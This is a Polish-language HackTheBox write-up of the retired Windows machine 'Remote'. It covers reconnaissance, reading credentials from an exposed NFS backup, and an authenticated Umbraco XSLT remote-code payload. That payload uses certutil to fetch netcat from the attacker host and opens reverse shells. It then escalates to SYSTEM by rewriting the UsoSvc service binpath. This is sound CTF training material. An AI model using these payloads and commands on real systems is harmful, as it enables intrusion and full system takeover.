Writeup: Maszyna HackTheBox Remote

Uwaga: Zgodnie z polityką HTB dozwolone jest publikowanie rozwiązań wyłącznie wycofanych maszyn. Maszyna opisana w tym artykule - Remote - spełnia ten warunek.

Machine Info

1. TLDR

Remote graph

2. Przygotowanie

Przygotowałem przydatne zmienne:

export IP=10.10.10.180

3. Skanowanie i rozpoznanie

Na początek użyłem narzędzia nmap do identyfikacji otwartych portów:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $nmap -p- -sC -sV -Pn -n -oN nmap/01-initial.txt -T4 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 19:39 CEST
Warning: 10.10.10.180 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.180
Host is up (0.044s latency).
Not shown: 47073 closed ports, 18448 filtered ports
PORT   STATE SERVICE    VERSION
21/tcp  open ftp      Microsoft ftpd
80/tcp  open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp  open rpcbind?
135/tcp  open msrpc     Microsoft Windows RPC
139/tcp  open netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open microsoft-ds?
2049/tcp open mountd    1-3 (RPC #100005)
5985/tcp open http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49680/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|  3.00: 
|_  Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6267.16 seconds

W międzyczasie spróbowałem użyć przeglądarki i przetestować istnienie serwera HTTP. Na maszynie była hostowana strona przedsiębiorstwa Acme Widgets:

Acme Widgets Webpage

Szybki przegląd źródła strony w celu ujawnienia pozostawionych przydatnych komentarzy był bezskuteczny. Uruchomiłem więc narzędzia gobuster oraz nikto.

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster/01-gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:      http://10.10.10.180
[+] Threads:    10
[+] Wordlist:    /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:   gobuster/3.0.1
[+] Timeout:    10s
===============================================================
2020/08/21 23:15:58 Starting gobuster
===============================================================
/contact (Status: 200)
/blog (Status: 200)
/home (Status: 200)
/products (Status: 200)
/people (Status: 200)
/Home (Status: 200)
/Products (Status: 200)
/Contact (Status: 200)
/install (Status: 302)
/INSTALL (Status: 302)
/1112 (Status: 200)
/intranet (Status: 200)
/1117 (Status: 200)
/1114 (Status: 200)
/person (Status: 200)
/1115 (Status: 200)
/1113 (Status: 200)
/1119 (Status: 200)
/1107 (Status: 200)
/1125 (Status: 200)
/1106 (Status: 200)
/1127 (Status: 200)
/1110 (Status: 200)
/1116 (Status: 200)
/1120 (Status: 200)
/1122 (Status: 200)
/1111 (Status: 200)
/1129 (Status: 200)
/1123 (Status: 200)
/1124 (Status: 200)
/1121 (Status: 200)
/1128 (Status: 200)
/1148 (Status: 200)
/1126 (Status: 200)
/1118 (Status: 200)
/Intranet (Status: 200)
/HOME (Status: 200)
/Install (Status: 302)
/About-Us (Status: 200)
/CONTACT (Status: 200)
/001110 (Status: 200)
/001117 (Status: 200)
/001106 (Status: 200)
/001108 (Status: 200)
/001115 (Status: 200)
/001109 (Status: 200)
/01119 (Status: 200)
/001121 (Status: 200)
/001119 (Status: 200)
/001116 (Status: 200)
/001118 (Status: 200)
/001123 (Status: 200)
/001124 (Status: 200)
/001122 (Status: 200)
/01118 (Status: 200)
/001126 (Status: 200)
/001127 (Status: 200)
/PRODUCTS (Status: 200)
/001148 (Status: 200)
/001125 (Status: 200)
/001112 (Status: 200)
/001128 (Status: 200)
/01106 (Status: 200)
/01109 (Status: 200)
/01114 (Status: 200)
/Person (Status: 200)
/PEOPLE (Status: 200)
/01117 (Status: 200)
/001129 (Status: 200)
/001113 (Status: 200)
/001111 (Status: 200)
===============================================================
2020/08/22 04:45:37 Finished
===============================================================
┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $nikto -h $IP -nossl | tee nikto/01-initial.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:     10.10.10.180
+ Target Hostname:  10.10.10.180
+ Target Port:    80
+ Start Time:     2020-08-21 23:16:04 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server banner has changed from '' to 'Microsoft-IIS/10.0' which may suggest a WAF, load balancer or proxy is in place
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress
+ Scan terminated: 20 error(s) and 3 item(s) reported on remote host
+ End Time:      2020-08-21 23:26:19 (GMT2) (615 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Jednym z interesujących zasobów, wykrytym przez narzędzie gobuster, był /install. Przy próbie dostępu do tego zasobu nastąpiło przekierowanie do /umbraco, gdzie widoczny był formularz logowania do systemu CMS Umbraco:

Umbraco SignIn Form

W międzyczasie dostałem wyniki ze skanowania portów nmapem. Poniżej te, które przykuły moją uwagę:

4. Uzyskanie dostępu

Wiedząc o istnieniu udostępnianego przez NFS zasobu /site_backups, spróbowałem uzyskać do niego dostęp:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $sudo mkdir /var/site_backups
[sudo] password for t4wny0wl: 
┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $sudo mount -t nfs $IP:/site_backups /var/site_backups
┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $ls -lah /var/site_backups/
total 119K
drwx------ 2 nobody 4294967294 4.0K Feb 23 19:35 .
drwxr-xr-x 1 root  root    142 Aug 24 08:37 ..
drwx------ 2 nobody 4294967294  64 Feb 20 2020 App_Browsers
drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
drwx------ 2 nobody 4294967294  64 Feb 20 2020 aspnet_client
drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
drwx------ 2 nobody 4294967294  64 Feb 20 2020 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294  89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
drwx------ 2 nobody 4294967294  64 Feb 20 2020 scripts
drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
-rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config

Uzyskałem dostęp do kopii zapasowej serwisu - co najmniej do źródła strony. Zainteresował mnie plik Web.config. Przeszukując plik konfiguracyjny znalazłem interesującą linię:

Umbraco Connection String

Przeszukałem zatem projekt w celu ujawnienia pliku bazy danych Umbraco.sdf:

┌─[t4wny0wl@whitehatlab]─[/var/site_backups]
└──╼ $find ./ -type f -name Umbraco.sdf 2>/dev/null
./App_Data/Umbraco.sdf

Szybka inspekcja pliku dostarczyła kilku istotnych informacji:

┌─[t4wny0wl@whitehatlab]─[/var/site_backups]
└──╼ $strings ./App_Data/Umbraco.sdf | less
...
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}
...

Zanim przystąpiłem do łamania haseł, sprawdziłem czy skrót jednego z nich nie istnieje w tęczowych tablicach:

Admin crack station

Znając parę danych uwierzytelniających admin@htb.local:baconandcheese, spróbowałem zalogować się wykorzystując do tego formularz logowania dostępny pod adresem http://10.10.10.180/umbraco.

W efekcie uzyskałem dostęp do panelu administratora:

Umbraco admin panel

Następnie przeszukałem bazę exploitdb:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $searchsploit umbraco
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                    | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                | php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Sprawdziłem jeszcze wersję zainstalowanej isntancji Umbraco:

Umbraco version

W celu przygotowania exploita wykonałem kopię jego szablonu i przygotowałem kopię nc.exe:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $ cp /usr/share/exploitdb/exploits/aspx/webapps/46153.py download.py
┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $cp /usr/share/windows-resources/binaries/nc.exe 74wny0wl.exe

Następnie wyedytowałem fragment pliku download.py i wykorzystałem narzędzie certutil do pobrania zasobu ze zdalnej lokalizacji. Sposób wykorzystania narzędzia certutil został opisany w projekcie LOLBAS:

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c certutil.exe -urlcache -split -f http://10.10.14.182/74wny0wl.exe C:/Users/Public/74wny0wl.exe"; \
 System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

W celu przesłania pliku 74wny0wl.exe, uruchomiłem skrypt download.py:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $python3 download.py 
Start
[]
End

oraz serwer http:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.180 - - [05/Sep/2020 20:01:22] "GET /74wny0wl.exe HTTP/1.1" 200 -
10.10.10.180 - - [05/Sep/2020 20:01:23] "GET /74wny0wl.exe HTTP/1.1" 200 -

W celu nawiązania połączenia, zmodyfikowałem kopię pliku download.py (connect.py):

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c C:/Users/Public/74wny0wl.exe 10.10.14.182 4444 -e cmd.exe"; \
 System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

Następnie uruchomiłem skrypt connect.py:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $python3 connect.py 
Start
[]

oraz narzędzie netcat:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.182] from (UNKNOWN) [10.10.10.180] 49921
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

Sprawdziłem nazwę aktualnego użytkownika oraz podstawowe informacje o systemie:

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

C:\Users\Public>systeminfo
systeminfo

Host Name:         REMOTE
OS Name:          Microsoft Windows Server 2019 Standard
OS Version:        10.0.17763 N/A Build 17763
OS Manufacturer:      Microsoft Corporation
OS Configuration:     Standalone Server
OS Build Type:       Multiprocessor Free
Registered Owner:     Windows User
Registered Organization:  
Product ID:        00429-00521-62775-AA801
Original Install Date:   2/19/2020, 4:03:29 PM
System Boot Time:     9/5/2020, 8:00:27 AM
System Manufacturer:    VMware, Inc.
System Model:       VMware7,1
System Type:        x64-based PC
Processor(s):       4 Processor(s) Installed.
              [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
              [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
              [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
              [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:       VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:     C:\Windows
System Directory:     C:\Windows\system32
Boot Device:        \Device\HarddiskVolume1
System Locale:       en-us;English (United States)
Input Locale:       en-us;English (United States)
Time Zone:         (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:   4,095 MB
Available Physical Memory: 427 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 776 MB
Virtual Memory: In Use:  4,023 MB
Page File Location(s):   C:\pagefile.sys
Domain:          WORKGROUP
Logon Server:       N/A
Hotfix(s):         5 Hotfix(s) Installed.
              [01]: KB4534119
              [02]: KB4462930
              [03]: KB4516115
              [04]: KB4523204
              [05]: KB4464455
Network Card(s):      1 NIC(s) Installed.
              [01]: vmxnet3 Ethernet Adapter
                 Connection Name: Ethernet0 2
                 DHCP Enabled:  No
                 IP address(es)
                 [01]: 10.10.10.180
                 [02]: fe80::2d06:38de:d177:5cb6
                 [03]: dead:beef::2d06:38de:d177:5cb6
Hyper-V Requirements:   A hypervisor has been detected. Features required for Hyper-V will not be displayed.

i ostatecznie odczytałem flagę użytkownika:

c:\windows\system32\inetsrv>type c:\Users\Public\user.txt
type c:\Users\Public\user.txt

c9cfdb7768a2bf12acecfd2e716d9cf3

5. Eskalacja uprawnień

Przygotowałem do pobrania winPEASAny.exe z projektu PEASS - Privilege Escalation Awesome Scripts SUITE:

W celu pobrania exploita, wykonałem jego kopię do katalogu wykorzystywanego już przez serwer www:

┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $cp /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/Obfuscated\ Releases/winPEASany.exe ./

Następnie ponownie wykorzystałem narzędzie certutil.exe i pobrałem plik na atakowaną maszynę:

c:\windows\system32\inetsrv>certutil.exe -urlcache -split -f http://10.10.14.182/winPEASany.exe C:/Users/Public/winPEASany.exe
certutil.exe -urlcache -split -f http://10.10.14.182/winPEASany.exe C:/Users/Public/winPEASany.exe
**** Online ****
 000000 ...
 06be00
CertUtil: -URLCache command completed successfully.

i uruchomiłem narzędzie winPEASAny.exe:

c:\windows\system32\inetsrv>cd C:\Users\Public
cd C:\Users\Public

C:\Users\Public>winPEASany.exe

Na standardowym wyjściu pojawiła się interesująca informacja: prawo dostępu do usługi UnoSvc (Update Orchestrator Service) było skonfigurowane jako SERVICE_ALL_ACCESS:

 [+] Modifiable Services
  [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
  LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
  UsoSvc: AllAccess, Start

Odczytałem konfigurację usługi UnoSvc:

C:\Users\Public>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UsoSvc
    TYPE        : 20 WIN32_SHARE_PROCESS 
    START_TYPE     : 2  AUTO_START (DELAYED)
    ERROR_CONTROL   : 1  NORMAL
    BINARY_PATH_NAME  : C:\Windows\system32\svchost.exe -k netsvcs -p
    LOAD_ORDER_GROUP  : 
    TAG        : 0
    DISPLAY_NAME    : Update Orchestrator Service
    DEPENDENCIES    : rpcss
    SERVICE_START_NAME : LocalSystem

a następnie podmieniłem ścieżkę do pliku wykonywalnego:

C:\Users\Public>sc config UsoSvc binpath= "cmd.exe /c \"C:\Users\Public\74wny0wl.exe -e powershell.exe 10.10.14.182 5555\""
sc config UsoSvc binpath= "cmd.exe /c \"C:\Users\Public\74wny0wl.exe -e powershell.exe 10.10.14.182 5555\""
[SC] ChangeServiceConfig SUCCESS

Tuż przed zrestartowaniem usługi przygotowałem się na nawiązanie nowej sesji:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $nc -nvlp 5555
listening on [any] 5555 ...

Zrestartowałem usługę narzędziem sc:

C:\Users\Public>sc stop UsoSvc
sc stop UsoSvc

SERVICE_NAME: UsoSvc 
    TYPE        : 30 WIN32 
    STATE       : 3 STOP_PENDING 
                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
    WIN32_EXIT_CODE  : 0 (0x0)
    SERVICE_EXIT_CODE : 0 (0x0)
    CHECKPOINT     : 0x3
    WAIT_HINT     : 0x7530

C:\Users\Public>sc start UsoSvc
sc start UsoSvc

i odczytałem flagę roota:

┌─[✗]─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Remote]
└──╼ $nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.182] from (UNKNOWN) [10.10.10.180] 49697
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
956f437ebcea3b91e92027568e754b85

6. Podsumowanie

Do zdobycia flag doprowadziły poniższe okoliczności: